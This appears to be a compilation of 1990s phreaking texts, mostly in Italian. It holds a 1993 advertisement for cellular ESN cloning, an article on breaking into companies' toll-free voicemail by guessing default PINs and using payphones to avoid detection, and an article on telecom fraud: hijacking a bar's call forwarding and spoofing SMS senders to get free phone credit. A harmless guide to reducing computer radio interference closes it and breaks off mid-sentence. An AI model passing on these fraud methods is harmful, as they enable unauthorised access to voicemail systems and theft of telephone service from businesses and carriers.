The above illegal cloning of subscriber's cellular telephones and the
reverse engineering of manufacturer's software has been adapted by a number
of legitimate companies. It is now possible to have more than one phone
per cellular telephone number. Several companies are now offering legal
cloning or emulation where for a fee of around $200-$300 they will program
your second phone with the ESN of your currently active phone.
To avoid fraud these companies often ask for a copy of a current cellular
telephone bill showing the mobile number and subscribers name. This is
then compared with picture ID to insure that the customer is a legitimate
bill paying subscriber.
Once a phone has been emulated the following should be noted:
1. If an attempt is made to use both phones at the same time and in the
same system one of the following will occur:
OUTGOING CALLS - First call will complete as normal, second phone will
get a fast busy, system deny recording, or call will drop.
INCOMING CALLS - Both phones may ring and call can be answered but might
immediately drop. Strongest signal may ring and call can be answered.
Neither phone will ring.
2. If one phone is in the home market and one is roaming both phones
should work and it should be possible to call your own number. This
depends on the roaming agreement between the two systems. In systems with
"Automatic Roaming" or "Super Access" agreements it may be necessary to
turn off the auto call forwarding to avoid problems, dial * O F F SEND in
many locations.
3. If both phones are roaming in DIFFERENT systems do NOT attempt to have
both phones turned on at the same time as your home system will probably
generate a roam fraud message and CUT THE PHONE OFF!
4. If the secondary (cloned) phone is stolen call the carrier and have
the mobile number changed, re-program the primary phone with the new
number. Do not report the phone stolen as the ESN will be locked out and
neither phone will work. If you know the secondary phone's ORIGINAL ESN
report this as stolen and tell the carrier that the phone was not active.
Nine times out of ten if the thief tries to activate the phone the hardware
serial number (assumed to be the correct ESN) will be checked on the deny
list and service will be denied. If the original ESN has not been reported
stolen and the phone is activated using the hardware serial number the
phone won't work as the ESN is incorrect!
If the "correct" emulated ESN is read from the phone service will probably
be denied if the thief tries to activate the phone on the same home system
as the primary phone. This is because many systems do not allow two
numbers on one ESN. The thief could activate service on an alternate
system.
You could prevent the emulated phone from working by having the ESN in the
primary phone emulated to another phone, you can then report the phone's
ESN as stolen. This is not recommended as using a phone with a stolen ESN
would cause problems if you ever need to use the original ESN. Remember
that legitimate emulation does not remove the original ESN, it simply adds
some code to make the phone appear to have a different ESN.
5. If the primary phone is stolen you can report the theft, then have the
secondary phone's ESN changed back to it's original or re programed to
match another phone. This will usually be done for a nominal charge.
As of April 1993 California Grapevine Communications offers ESN emulation for
the following phones (call for latest list):
AUDIOVOX: - 832, 832A, 1000, 4200A
BC - 40, 45, 55, 55A, 65A, 410.
CMT - 300A, 400, 405, 410A, 420, 450, 550, 600, 605, 750, 1700.
CTR - 420A, 1900, 2000,
CTX - 1500, 2500, 3100A, 3200A, 4000, 4100A
PRT - 200
SP - 85, 85A, 95,
TRANS - 420
NEC: 3700, 3800, 4000
M3800, M4500, M4600, M4700, M4800
P200, P300, P301
P9000, P9100
NOVATEL: 8300, 8301, 8305, 8305A, 8320, 8320A
PTR825
PANASONIC: EB2500, EB2501 (TP500, 501)
PIONEER: SEE MOTOROLA
MOTOROLA: ALL MOBILES, TRANSPORTABLES AND BAG PHONES.
ALL FLIPS, 8000 SERIES AND ULTRA CLASSICS PRIOR TO VERSION 9121.
NO MICROTAC LITE'S (YET)
TECHNOPHONE: MC905, MC905MKII/985/995
THE FOLLOWING MUST BE EMULATED TO SAME BRAND:
SHINTOM, UNIDEN, GE
The price for Emulation is $199.00 (mention this software) plus shipping.
Proof of ID, valid Cellular account and social security number are required.
Please call or write for further information.
25082 LUNA BONITA DRIVE, LAGUNA HILLS, CA, 92653
TEL: (714)643-8426 FAX: (714)643-8379
COPYRIGHT 1993 CALIFORNIA GRAPEVINE COMMUNICATIONS
-+-+-+-+-+-+---+-+-+-+-+-+-+-+-+-+-+-+sYn^ ringrazio la california corporation!!!!
SEGRETERIE TELEFONICHE
Autore: mR_bIs0n
Consumo: merendine e panini farciti alla nutella...
Musika askoltata: vari mp3 direttamente dal mio MPMan... uahhhh 180 karte!!!
Saluti a: Panino, Luigi, Biby, Carmine, Meriak, Mr_Skull, Piccinni, Pr0digY, e
tutti quelli della mailing di Spaghetti Phreakers...
Dedicato a: Daniela ke si trovato uno scemo di ragazzo di 1ø ke le fa le
corna... Ilaria ke si trovato uno scemo di 3ø ke le fa le corna
(1øaggiornamento: SI E'LASCIATAAAAAAAAAAAAAAA KOME GODOOOOOOOOO)
(2øaggiornamento: si messa con uno stronzo di 1ø... bene...
tutte quelle giornate passate a costruire esplosivi serviranno
finalmente a qualkosa)...
alle altre tre Ilarie (una di Roma, una amika della sorella di
Skull e una amika di una mia amika di skuola...)
Fankulo a: tutti i falsi hackers e phreakers, prof.essa di Latino e infine a
quelli di CalcioMania ke non accettato il mio ordine con carta di
credito di soli 7 milioni... uffa ci tenevo ai completi
Casa/Trasferta/Coppa della Lazio... cmq...
**********
* So'Mario * (cio "sono Mario")
**********
* (1)Intro *
* (2)Dove reperire le segreterie *
* (3)Le segreteire *
* (4)Come agire *
* (5)Una volta indiviuata *
* (6)Cosa ne faccio??? *
* (7)I riski *
* (8)Ne potevi fare a meno??? *
* Una nota preziosa sull'autore *
- 01 - Intro
Bene bene... ci risentiamo dopo tanto tempo... ma sapete... stata dura
trovare un'altra rivista ke mi ospitasse... vabb bando alle ciance (mamma
mia ke fastidio ke mi da'questa frase...) ho voluto scrivere quest'artikolo
per fare un po'di luce sulle segreterie telefonike su numero verde... spero vi
sia utile...
- 02 - Dove reperire le segreterie
Una kosa molto importante quella di trovare del materiale utile per
reperire numeri verdi e di conseguenza segreterie telefonike... allora vi
potrebbero servire:
- giornali del tipo: "Famiglia Puttana"... cio "Famiglia Cristiana"...
"Grazia"...
- giornalacci porno direte voi, vero? ne dubito... comunque visto ke ci
tenete vi lascio dei titoli... "Super Joint", "Selen, Puledra in calore",
"Grande e Calda"...
- le Pagine Gialle della Seat... possiamo trovare tanti bei numeretti di
ditte e aziende...
- le Pagine Utili della Mondadori... anke l possibile trovare numeri
utili...
- l'elenko telefoniko cos vasto di numeri ke diventa difficile trovare
ci ke ci serve... cmq...
Una volta ke avete un po'di roba potete iniziare a fare le prove per trovare
il numero con la segreteria da sverginare... ma prima...
- 03 - Le segreterie
Esistono vari tipi di segreterie... possiamo dividerle in segreterie a mono
casella (es. le segreterie Memotel) e a multi casella(es. Meridian della
Northen Telekom)... bene vediamo le caratteristike...
le segreterie a mono casella vocale sono delle segreterie molto meno evolute
ma pi- semplici da usare... infatti con le segreterie tipo Memotel c' un
solo "padrone" della segreteria perk esiste appunto una sola casella da
governare... ci vuol dire ke potete settare il messaggio di benvenuto e
quando kiameranno il numero, ki vi kiamer
, ascolter
subito la vostra voce
registrata...
le segreterie a multi casella, invece, sono delle segreterie con pi- di una
casella vocale... ci vuol dire ke si possono avere pi- "padroni" perk ci
sono pi- caselle da governare... cosikk si possono creare comunit
di pi-
utenti ke si skambiano messaggi... queste segreterie sono pi- avanzate... e
quindi pi- complicate... a volte sono piene zeppe di men- vocali ke nemmeno io
riesko a rikordare... a volte bisogna scriverseli... molto spesso kueste
segreterie sono utili anke per fare kiamate gratuite... ma andiamo avanti...
- 04 - Come agire
Bene... una volta kiamato un numero verde bisogna fare delle prove... ora vi
spiego...
per prima kosa kiamate esklusivamente in orari non di ufficio, e cio, dopo
le 18.30... a volte anke alle 19.00... io veramente lo faccio dopo le 21.00
perk coincide proprio coll'orario ke sto seduto al cesso col cell di mia
madre... HEHEHEH....
allora, una volta composto il numero aspettate fino a quando non sentirete
voci o segnali... se dopo un po'di squilli non risponde niente o se invece
sentirete la vocina da castrato della telekozz ke dice: "Kakkio!
Avete kiamato in orario..." (Veramente kakkio non lo dice...), lasciate
perdere perk sikuramente il numero stakkato per motivi di soldi!!!
Se kiamate da cell e dice ke la kiamata proviene da un'area non abilitata,
lasciate perdere e provate da kabina...
se ankora, quando kiamate vi dikono: "... vi sar
passato un operatore..."
oppure sentite direttamente: "Pronto sono Asdrubale, come posso aiutarla..."
attakkate immediatamente perk i pezzenti ke avete kiamato non vanno mai a
dormire... ke koglioni...
quando finalmente prendete la linea, nella maggiorparte dei casi sentire una
voce ke avverte ke avete kiamato in orario non di ufficio...
ora bisogna accertarsi se esiste una segreteria, anke se non attivata...
quindi per prima kosa aspettate e sentite per intero il messaggio... una
volta finito se stakka immediatamente, rikiamate... se invece vi si presenta
un men- ankora meglio... se invece vi dikono di lasciare un messaggio in
segreteria potrete esultare a piacimento e, volendo, farvi dei pompini da soli
anke se risulterebbe molto difficile...
oki andiamo per ordine: tentate di avvicinare il vostro capo alla zona
pubica... ehm... skusate...
oki andiamo per ordine: se vi riattakka, rikiamate e premete per prima kosa
cancelletto o diesis (#)... ascoltate kosa dice... se non dice niente allora
provate con asterisko (*)... ascoltate kosa dice... se neanke kuello fa
niente allora premete a kazzo tutti i tasti della tastiera... E KE KAKKIO!!!
bene, se al premere del cancelletto sentite qualkosa di nuovo tipo: "Inserire
il codice di identificazione..." oppure "Inserire il numero di casella
vocale..." siete a kavallo e potete anke tentare, senza esiti konkreti, di
suonare una melodia con vari scorreggi uscenti dal vostro ano...
se vi si presenta un men- siete forse gi
entrati nella segreteria... ma
bisogna aspettare e ascoltare tutto ci ke dice...
se vi dice di lasciare un messaggio, dite kualkosa di infinitamente stupido e
premete cencelletto... forse dopo potrete entrare nella segreteria...
Tutto potrebbe sembrare un po'confusionario, ma rikordate ke sar
tutto pi-
semplice provando pratikamente...
- 05 - Una volta individuata
Allora se vi trovate ke dovete immettere un kodice, tipo un PIN, nella
maggiorparte dei kasi sar
sikuramente di 4 cifre... non solo perk il kodice
deve essere abbastanza corto da essere rikordato dagli inetti ke lavorano
alla segreteria... ma anke perk usato spesso... bene... ora kapite bene ke
nella stragrande maggiorparte dei kasi il kodice 1234, usato standard in
molte segreterie... non sar
certo una novit
... seguono a secondo e terzo
posto di popolarit
0000 e 1111... se non vanno bene anke kuesti provate altre
composizioni semplici... tipo 5555 o 9876... successivamente il kodice deve
essere cambiato... il fatto sta ke nel mondo esistono molti pi- mentekatti di
quanti ne possiamo immaginare... rabbrividiamo... brrrrrr....
- 06 - Cosa ne faccio???
Un kazzo potrei dirvi... ma invece gli usi sono molti!!!
Se una segreteria mono-casella potete usarla per iniziare a capire come
funzia il gioko del conquistare segreterie... infatti ne potete fare un uso
proprio... cio voi date il numero agli amici e loro vi lasciano messaggi ke
poi potrete ascoltare... inxomma proprio kome una segreteria ma su numero
verde... quindi completamente gratiz!!!
Mentre se avete trovato una segreteria multi-casella... il gioko si fa
pesantuccio perk esistono metodi per fare uscire chiamate verso altri numeri
partendo dal numero verde... ehehehehhe ma questo cambia da segreteria a
segreteria e quindi vi conviene lavorarci sopra parekkio...
- 07 - I riski
Bene, dopo essermi documentato ben ben sono arrivato ad una conclusione nel
caso dell'illegalit
di questi metodi... il fatto ke non esisterebbe nessuna
legislazione ke ci impedisce di utilizzare una segreteria su numero verde...
naturalmente se la ditta a kui avete fottuto la segreteria vedendo nel
tabulato delle kiamate al numero vede ke la maggiorparte delle kiamate
proviene dallo stesso numero e vede anke ke il 90% del traffiko lo avete
ausato voi... potrebbe anke fare una denuncia... comunque voi agite per
lo pi- da kabina... e poi non abbiate mai paura...
- 08 - Ne potevi fare a meno???
Kredo proprio di si... komunque sono contento di essere ritornato di nuovo
nell'ambiente underground digitale e cyberpunk, e spero di continuare a
scrivere in queste e anke in altre riviste...
* Note sull'autore *
mR_bIs0n nato a a Santo Billo alla Pozzanghera nel 1984 (come aveva sempre
desiderato). Ha scritto molti artikoli per varie riviste, a volte senza
esserne consapevole. Partecipa ad eventi del tipo "La sagra del Prepuzio
fritto" e "Fiera degli spazzolini da denti". E'stato pi- volte sposato.
Le mogli non lo sapevano.
---mR_bIs0n---
(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=
RICARICARSI IL CELLULARE O ALMENO PROVARCI
AUTORE: Screener_it
E-MAIL: screener_it@freemail.it
WEB-SITE: http://go.to/tankcommandos
ICQ: 35140176
SCRITTO IL: 04 settembre
MUSICA: The Coors - Forgiven, not Forgotten
(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=(-)=
Ciao belli !!!!
Vi scrivo questo articoletto da un posto un po' particolare.
Sapete dov'è l'Irlanda ? Quell'isola a nord dell'Europa.. Ecco, io vi sto scrivendo
da Dublino, che è la capitale dell'Irlanda.. Che volete di più ? Vi faccio anche le
lezioni di geografia comprese nel prezzo !!!
Un giorno vi racconterò tutti i particolari di queste 2 settimane in terra straniera..
Per chi se lo chiedesse sono andato all'estero to improved my english !!
Colgo l'occasione per salutare Daniele (e tagliati il pizzetto che sembri una pecora !!)
e Andrea di Brescia (cos'è che ti mancava di più dell'Italia ? Il fumo ?) che ho conosciuto
entrambi qui. CIAO A TUTTI DUE !!!
Un saluto particolarissimo a Ximo, un ragazzo spagnolo che abitava nella mia stessa casa !!
Quest'oggi come avrete capito dal titolo vi parlerò di come ricaricare i cellulari in maniera
+ o - legale..
Questo argomento è stato argomento di numerossisime serate passate in chat. Vi dico subito
che sull'argomento girano vere e proprie leggende urbane.. Io ho addirittura sentito uno che
chiedeva:"Scusate, sapete qual'è il green a cui telefoni e ti ricaricano gratis il cellulare ?".
Se c'è un green che ricarica il cellulare mi metto a correre da Milano a Roma completamente
nudo !!!
Per ricaricare un cellulare al momento conosco solo i metodi, se ne conoscete altri mailatemi
pure, sarò più che felice di mettere anche le vostre aggiunte (e i vostri nomi) sul txt.
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/
Primo metodo per ricaricare il cellulare: andare in edicola e comprare/rubare una ricarica
per il vostro cellulare.. Non credo che ci sia bisogno di dire che questo metodo mi fà
schifo !! Il solo pensiero di dover sganciare 60 karte per la ricarica o dover fare una
corsa con il cuore in gola per scappare all'edicolante impazzito di rabbia mi girano i
coglioni.. Quindi metodo subito scartato !!
Un altro metodo è il trasferimento di chiamata applicato al cellulare.. 'Spetta che spiego
meglio !!
Premetto che questo metodo l'abbiamo inventato io e XXXXX (scusa ma non ricordo proprio il
tuo nick nè riesco a trovare il log della nostra discussione su #Phreak.it).
Testato su cellulari TIM con l'opzione AUTORICARICA 190, per gli Omnitel e Wind non và.
Dunque.. Il trucco del trasferimento di chiamata lo conoscete (chi non lo conosce vada nella
sez. TESTI DEGLI ALTRI del sito del Tank Commandos e troverà il testo "Truffa telefonica con
il trasferimento di chiamata").
L'unica cosa che dovete cambiare è che come numero di destinazione metterete il numero del
vostro cellulare.
Ogni chiamata che sarà fatta al bar vi verrà trasferita al cellulare e per ogni minuto di
telefonata riceverete mi pare 70 £ che non è male.. Quando vi chiamano chiedendovi se siete
il tal barista dite che la sua linea deve avere qualche problema xkè continuate a ricevere
voi le chiamate dirette a lui e non riuscite a spiegarvene il perchè.
Se vi chiedono chi siete mi pare logico che darete dati falsi e dite che abitate in paesi
lontani (se vi chiamano da Verona dite che siete di Milano, ecc..).
C'è poi il metodo di MYGSMBOX.com che mi è venuto in mente qui in Irlanda ma devo ancora
testarlo.
Come ben sapete (e chi non lo sa lo saprà adesso) spedendo i messaggi SMS con MYGSMBOX.com
potete fare in modo che come numero del mittente appaia qualsiasi numero di
cellulare vogliate, al contrario ad esempio di Kataweb, iol.it, ecc.. che mettono come
numero di origine numeri standard come 2424 o altro, adesso non mi ricordo con precisione..
Cmq iscrivetevi a MYGSMBOX.com e mettete con numero del vostro cellulare un qualsiasi
numero TIM (033X XXX XXXX) e poi, sempre ammesso che abbiate attivo il servizio di
AUTORICARICA 190, speditevi i messaggini e ricaricatevi di 25£ per ogni messaggio.
L'ultimo consiglio che posso darvi per ricaricarvi il cellulare nel modo + legale il
possibile (non siamo mica ladri approfittatori noi, quella della TIM però sì !!) è andare
su http://216.221.175.58/cgi-bin/affiliate/ad.cgi?id=tank e poi cliccare sui banner "Clicca
qui e ricaricati il cellulare". Quest'ultimo trucco "supporta" finanziariamente Screener_it,
quindi se volete che continuo a scrivere gli articoli vedete di visitarlo in tanti e per tante
volte !!!
Tanto lo sapete che continuo a scrivere lo stesso (anche se molti di voi non lo vogliono) :-))
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/\==/
Screener_it & Tank Commandos Crew
screener_it@freemail.it
http://go.to/tankcommandos
DEDICATED:
- Tutti quelli che c'erano in Irlanda con me e a tutti gli italiani che ho incontrato e
conosciuto in Irlanda !! Ciao ragazzi !!
===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Elettronica=--====ooO===0===Ooo===oOOo===ooO===0===
1. Notizie
Data: 30 Gennaio 1994
Release: 1.4
2. Introduzione
Uno dei maggiori problemi nell'utilizzo dei computer in connubio agli apparecchi radio,
sia esso per scopi di controllo o per la decodifica di segnali, consiste nell'ammontare di
RFI (Radio Frequency Interference, cioè interferenza a radio frequenza) generata da queste
macchine. La maggior parte delle volte l'interferenza generata è abbastanza elevata da rendere
inutilizzabili determinate bande di frequenza, coprendo i segnali più deboli e distorcendo o
interferendo con i segnali desiderati. Questo comportamento è del tutto inaccettabile quando
si opera nei modi di trasmissione digitali, ed a volte perfino per l'utilizzo in CW
(trasmissione in codice morse). Ecco perchè il come ridurre o eliminare i disturbi a radio
frequenza rappresenta una delle domande più frequenti. La brutta notizia è che, a quanto ne so,
nella maggior parte dei casi non esiste alcun modo per rimuovere completamente le interferenze
a radio frequenza generate dai computer. La buona notizia è invece che esistono dei ben
definiti approcci da intraprendere per ridurre le interferenze a livelli molto più accettabili
e, in alcuni casi, a livelli del tutto trascurabili. Questo documento contiene una collezione
di suggerimenti provenienti da varie fonti e la descrizione di alcune operazioni da me effettuate
sul mio sistema per risolvere il problema in oggetto. Molti dei documenti da me esaminati si
riferiscono alla parte trasmittente, e riportano vari suggerimenti da mettere in atto per
impedire ai trasmettitori di generare RFI; questo documento è invece concepito dal punto di
vista della ricezione, contiene cioè dei suggerimenti per impedire ai ricevitori di essere
disturbati dalle sorgenti di interferenze a radio frequenza.
Suppongo che la maggioranza di voi abbia già tentato i passi basilari per tentare di migliorare
la ricezione dei segnali, per esempio spostando il ricevitore e l'antenna il più possibile,
sia fisicamente che elettricamente, dalle sorgenti di RFI (computer e monitor nel nostro caso),
ma sono anche cosciente del fatto che a volte ci siano delle limitazioni e costrizioni a
riguardo della distanza massima a cui si può arrivare. Potreste anche aver provato a modificare
l'orientamento del computer, del monitor, del ricevitore e delle antenne e dei cavi nel
tentativo di migliorare la situazione. Fatto ciò, cos'altro si può fare? E' la stessa domanda
che mi sono posto a suo tempo, ecco perchè ho scritto questo documento.
Ovviamente, sebbene abbia fatto del mio meglio per presentare le seguenti informazioni nella
migliore integrità, declino ogni responsabilità per eventuali incidenti o danneggiamenti
causati da errodi e omissioni nelle informazioni qui in appresso riportate.
3. Sorgenti di RFI
Prima di iniziare ad affrontare realmente il problema, potrebbe essere interessante essere a
conoscenza dei motivi per cui i computer generano interferenze a radio frequenza, e del modo
in cui queste interferenze riescano ad entrare nel ricevitore. I due componenti principali del
computer sono costituiti dall'unità centrale e dal monitor (per semplicità di descrizione). Il
computer funziona ad un certo clock, determinato dall'oscillatore interno; la maggior parte
delle volte le frequenze di oscillazione si aggirano sui 4.77 mHz, 8 mHz, 12 mHz, 16 mHz, 20
mHz, 25 mHz, 33 mHz, 40 mHz, 50 mHz, 66 mHz e 80 mHz. Ovviamente questa non è l'unica frequenza
generata, in quanto sulla scheda video è presente almeno un altro oscillatore, a cui si
aggiungono quelli presenti sulle altre schede. Come potete constatare, tutte queste frequenze
ricadono nelle bande HF e L-VHF, e possono ovviamente interferire con i segnali che vorremmo
ricevere. A peggiorare ulteriormente la situazione, queste frequenze sono di solito divise per
da appositi circuiti all'interno del computer, per generare un certo numero di altre
frequenze. Poichè il computer è un sistema digitale, la forma d'onda caratteristica di questi
segnali è l'onda quadra, che come è noto contiene una infinità di armoniche. Anche la scheda
video genera interferenze a radio frequenza in quanto il data-pixel-rate è spesso abbastanza
elevato da ricadere nelle bande HF. Per tutte queste ragioni i computer e i monitor sono i
migliori candidati se desiderate un perfetto generatore di RFI. La situazione viene spesso
peggiorata dai computer dotati di economici case in plastica, che non sono assolutamente in
grado di schermare seppur minimamente il sistema. Molta gente sostiene che i monitor
costituiscano una delle principali sorgenti di RFI, la qual cosa è tutt'altro che priva di
fondamento. Ho notato che anche le tastiere per PC generano una considerevole quantità di
interferenze a radio frequenza, nonostante il loro aspetto innocente; il motivo di tutto
questo risiede nel microprocessore montato sulla loro scheda, il cui funzionamento è basato
su una freuqneza di clock che si aggira sui 3 MHz. Il problema viene aggravato dal modo in
cui il circuito stampato della tastiera è costituito, che lo rende un discreto radiatore di
antenna a loop e quindi le armoniche possono essere ascoltate anche nell'intervallo
circostante la seconda e terza armonica. Il monitor probabilmente monta sulle proprie schede
un quarzo di circa 14.316 MHz, quindi con molta probabilità troverete su tale frequenza una
portante di forte intensità.
La prima cosa da stabilire è l'ammontare di RFI generata dall'unità centrale e dal monitor; è
possibile che l'unità centrale non irradi alcun segnale, ma il colpevole sia il monitor, o
viceversa. Per accertarsene è sufficiente spegnere il monitor e lasciare accesa l'unità
centrale, controllando il livello di interferenze ricevuto dalla radio. Ecco qui di seguito
la procedura suggerita:
Effettuate una veloce scansione della bande per trovare il punto in cui le interferenze
sono più forti. Questa operazione risulta utile perchè se riusciamo a ridurre la RFI su
questa frequenza, dovrebbe normalmente verificarsi una corrispondente riduzione della RFI
anche su altre frequenze, sebbene ciò non sempre si verifichi.
Scollegate il mouse, i cavi seriali e i cavi della stampante, il cavo della tastiera, il
cavo del segnale video del monitor, e il cavo di alimentazione del monitor. Se possibile,
per il momento fate funzionare il ricevitore a batterie. Ora accendete il computer e
controllate se le interferenze a radio frequenza sono diminuite di un valore apprezzabile.
Con il computer acceso, ricollegate la tastiera, quindi il mouse, quindi i cavi seriali,
i cavi paralleli, il cavo video, il cavo di alimentazione del monitor (ma lasciate il
monitor spento per ora). Mentre riconnettete i cavi, controllate se eventualmente si
verifica un aumento di RFI; se fortunatamente nessuna di queste operazioni di riconnessione
produce un apprezzabile aumento di RFI, allora potete considerarvi fortunati.
Accendete il monitor e controllate l'aumento della RFI; fate funzionare il monitor sia
in modo testo che nei vari modi grafici, per vedere se la RFI viene influenzata.
Alimentate la radio tramite l'alimentatore e di nuovo notate l'eventuale aumento di RFI.
Sconnettete la radio da qualunque antenna, sia essa esterna o interna, e notate se la RFI
sparisce. Notate che su alcune radio, quando si stacca il connettore dell'antenna esterna,
viene automaticamente abilitata l'antenna interna; per evitarlo, inserite un connettore
nella presa d'antenna.
Arrivati a questo punto dovreste avere una buona idea dei componenti che contribuiscono a
generare RFI; conservate questi appunti, mentre ci accingiamo ad esaminare un altro punto,
le vie percorse dalla RFI per entrare nel ricevitore.
Earl Morse KZ8E suggerisce questa procedura per identificare il punto esatto dove viene
generata la RFI:
"Nel caso in cui le procedure descritte in precedenza non portino ad alcun successo,
dovrete investigare sulla radiofrequenza emessa dal cabinet del monitor e del computer.
Costruite un loop con uno spezzone di cavo RG58, rivoltando la schermatura verso l'indietro
per 10 cm circa e creando con il conduttore centrale una coppia di spire del diametro
compreso tra 3 e 5 cm; saldate il conduttore centrale alla schermatura, nel punto in cui
avete provveduto a rivoltarla verso l'indietro. Collegate l'altra estremità del cavo al
ricevitore ed utilizzate la sonda così costruita per ricercare la fonte di RFI. Un cabinet
per computer non schermato a dovere può essere facilmente racchiuso con treccia di rame o
altri materiali conduttivi. Lo schermaggio del cabinet di un monitor presenta difficoltà
leggermente maggiori e potrebbe causare problemi di sicurezza (alta tensione) o di
sovrariscaldamento."
Se trovate eccessivamente difficoltoso il metodo sopra descritto, procuratevi semplicemente
un ricevitore portatile per onde medie e corte alimentato a batterie e dotato di antenna
interna in ferrite, ed iniziate a muovervi nei dintorni, ruotando il ricevitore radio man
mano che procedete. Spesso è possibile individuare con precisione le più forti sorgenti RFI
semplicemente spostandosi con la radio verso il punto dove il rumore si ascolta con maggiore
intensità. Naturalmente, la radio deve essere sintonizzata in una parte dello spettro in cui
sia già possibile in qualche modo ascoltare la RFI; effettuate tale operazione con la radio
posizionata vicino all'apparecchio sospetto e poi raffinate la sintonia. E' così possibile
avere idea del tipo di RFI presente e la frequenza su cui è focalizzata.
4. Come la RFI raggiunge il ricevitore
La RFI generata da una sorgente raggiunge il ricevitore attraverso strade diverse, che possono
essere rappresentate dall'alimentatore, dalla connessione di "terra" dell'alimentatore,
attraverso l'emissione radio diretta, o addirittura attraverso la "schermatura" che potrebbe
essere stata mal progettata, o utilizzata in modo non idoneo. In queste situazioni si
presentano un certo numero di casi da trattare. Se, arrivati al punto (6) della lista
precedente, la vostra radio è ancora influenzata dalla RFI pur senza alcuna antenna collegata,
allora la schermatura del vostro ricevitore è scadente. Se, arrivati al punto (5) della lista,
la RFI cresce nel momento in cui la radio viene ricollegata alla rete elettrica o
all'alimentatore, allora la RFI entra attraverso le connessioni di alimentazione. Se la radio
è collegata direttamente o indirettamente al computer attraverso la porta seriale o una
qualche altra interfaccia, anche quella potrebbe essere una potenziale via di ingresso per la
RFI; potete scoprire se il vostro problema dipende dalle connessioni seriali seguendo la
procedura descritta al punto (3) della precedente lista. Se la RFI cresce in modo apprezzabile
riconnettendo l'antenna esterna, allora è segno che la RFI potrebbe arrivare via radio o
essere raccolta dal cavo dell'antenna.
Ricordate che in molti casi la RFI proviene da più di una strada, e che perciò è importante
controllare tutte le possibilità. D'altro canto, se una sola delle vie di accesso è quella che
solo quella. Altre misure preventive consistono nel tenere i cavi e le connessioni più corte
possibile, in modo da impedire che si trasformino in elementi radianti per la RFI generata
dall'apparecchio. Se possibile, collegate la vostra radio ad un differente circuito di
alimentazione ma fate attenzione ai collegamenti di terra, in modo da evitare il formarsi di
pericolosi potenziali elettrici.
5. Come eliminare la RFI
Come potrete probabilmente constatare, la RFI è una combinazione di problemi e non un problema
unico. I problemi possono essere classificati in 3 categorie:
Problemi di schermaggio
Problemi di filtraggio
Problemi di progettazione
Non si tratta ovviamente di categorie ben definite, ma la suddivisione è stata fatta per
semplicità. In molti casi, un cattivo schermaggio è la prima cosa da sospettare, e pertanto
questo è il primo argomento che prenderemo in esame. Passiamo ai fatti.
6. Problemi di schermaggio
Quando parliamo di schermaggio, ci sono quattro aspetti da considerare: la radio stessa, il
monitor, l'unità centrale e la combinazione antenna/cavo. Uno schermaggio insufficiente può
dipendere benissimo da una cattiva progettazione di uno degli apparecchi sopra citati, ma può
anche essere causato anche da connettori sporchi o componenti vecchi. Esaminate gli apparecchi
per assicurarvi che tutte le connessioni siano solide, in particolar modo le connessioni della
massa dell'antenna, dell'alimentatore della radio, del case dell'unità centrale, e dei cavi
in genere. Assicuratevi che i cavi non siano vecchi e che tutte le connessioni siano pulite,
senza ossido sulle superfici. La presenza di ossido impedisce un buon contatto elettrico ed in
alcuni casi produce la rettificazione dei segnali, cosa che può portare alla generazione di
segnali fantasma o altri problemi.
Se, effettuando le operazioni descritte al punto (6) della lista riportata nel capitolo sulle
sorgenti RFI, avete appurato che il vostro problema è causato da una scadente schermatura
della radio, del monitor o dell'unità centrale, causato da problemi di progettazione, allora
occorre costruire uno schermaggio adeguato. Questo scopo si può raggiungere utilizzando
alluminio da cucina o spray conduttivo; l'idea è quella di foderare il contenitore degli
apparecchi in modo da schermarli con una barriera contro la RFI. L'operazione va effettuata
con attenzione in quanto, essendo lo schermaggio conduttivo, è possibile mettere
accidentalmente qualcosa in corto circuito e bruciare la vostra radio o qualunque altro
apparecchio che state tentando di schermare. Lo spray rappresenta probabilmente la migliore
soluzione, ma anche la più costosa. A mio parere l'alluminio da cucina fornisce
probabilmente la migliore schermatura, ma è anche il più difficile da applicare. Lo spray o la
vernice conduttiva presenta una minore conduttività ma si distribuisce più uniformemente ed
arriva più facilmente nei posti meno accessibili. Ciò che dovrete fare è rimuovere il
coperchio in plastica della radio o del monitor, ponendo attenzione ai cablaggi ed ai contatti
elettrici, e ricordando che l'apertura del contenitore quasi certamente invaliderà la
garanzia dell'apparecchio. Pulite con cura le parti interne del contenitore ed assicuratevi
che sia asciutto e non ci sia polvere o grasso sulle superfici prima di applicare lo spray;
potrebbe essere necessario applicare più di uno strato per raggiungere una migliore schermatura.
Assicuratevi che in qualche punto del contenitore, la vernice spray applicata venga a
contatto con la massa dell'apparecchio; ricordate che nei monitor, lo chassis non sempre è
connesso alla massa, perciò controllate questo particolare prima di procedere. Per realizzare
una schermatura efficiente è necessario che la copertura sia il più possibile completa, ma
fate attenzione a non spruzzare lo spray su commutatori o qualunque altro componente che
potrebbe causare un corto circuito, ed evitate di coprire le fessure per la ventilazione. A
questo punto potreste chiedervi come schermare la parte anteriore del tubo catodico, quella
dove appare l'immagine: nella maggioranza dei monitor a colori, la maschera presente
all'interno del monitor agisce proprio come uno schermo. Prima di rimontare i coperchi,
attendete che la vernice si asciughi; provate ad assicurare una buona massa per lo schermo,
facendo attenzione a non asportare la vernice. Nel caso dovessero verificarsi formazioni di
archi elettrici, coprite l'area interessata con del nastro isolante. Il tipo di spray che
utilizzo è noto come EMI-LAC o EMV-LACK (prodotto in Germania dalla Cramolin), ma sono in
commercio molti altri prodotti similari che dovrebbero svolgere lo
stesso lavoro. Nel caso non
riusciate a reperire vernice, spray o un adatto foglio di alluminio, anche il nastro adesivo
